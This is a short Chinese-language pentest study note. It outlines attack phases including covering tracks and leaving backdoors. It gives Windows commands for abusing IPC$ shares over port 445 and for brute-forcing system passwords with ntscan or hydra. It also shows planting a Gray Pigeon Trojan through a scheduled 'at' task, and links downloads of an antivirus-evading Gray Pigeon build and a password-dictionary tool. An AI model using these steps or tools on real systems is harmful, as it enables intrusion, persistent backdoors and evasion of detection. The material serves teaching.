day 09 簡單滲透測試

目錄

• 簡單滲透測試思路
  • 0.受權
  • 1.信息收集
  • 2.掃描漏洞
  • 3.漏洞利用
  • 4.提權（shell環境、桌面環境 == 最高權限）
  • 5.毀屍滅跡
  • 6.留後門
  • 7.滲透測試報告
• 簡單滲透測試過程
  • 1.445漏洞之 IPC$
  • 2.暴力破解系統密碼之445
  • 3.建立後門
• 相關軟件下載

簡單滲透測試思路

0.受權

1.信息收集

• nslookup 域名 查IP
• nslookup whois 查子域名

2.掃描漏洞

• nmap（掃描軟件） scanport（端口掃描）

  且利用 telnet 命令也能夠探測：telnet IP 端口號，若標題變成 telnet 則說明開放

• 首先基礎掃描 IP 範圍 端口

• 而後再根據端口深刻掃描 （IIS，apache，什麼網站）

• 高級掃描：

  掃描容器漏洞：如 IIS 漏洞 2003-IIS6.0 或 2008-IIS7.0 版本的

  掃描網站漏洞（SQL 等）

3.漏洞利用

4.提權（shell環境、桌面環境 == 最高權限）

5.毀屍滅跡

6.留後門

7.滲透測試報告

簡單滲透測試過程

1.445漏洞之 IPC$

net use f: \\10.1.1.2\share 密碼 /user:用戶  ==  把分享文件映射到本身電腦
net use f: /del
net use * /del
net use \\10.1.1.2\IPC$ 密碼 /user:用戶  == IPC漏洞

2.暴力破解系統密碼之445

• 軟件：ntscan1.0 //也可用 hydra
• 用字典編寫軟件編寫個字典

3.建立後門

• 用灰鴿子製做木馬
• copy 植入木馬
• net time \\10.1.1.2 查看目標當前時間
• at \\10.1.1.2 11:11 「c:\windows\system32\heihei.exe」 建立一個計劃任務，在11:11時運行exe文件

相關軟件下載

真空密碼字典生成器： https://lanzous.com/ibl5ywd

鴿子牧民戰天免殺專版0912： https://lanzous.com/ibl5y7i

內網端口掃描ScanPort： https://lanzous.com/ibl5y1c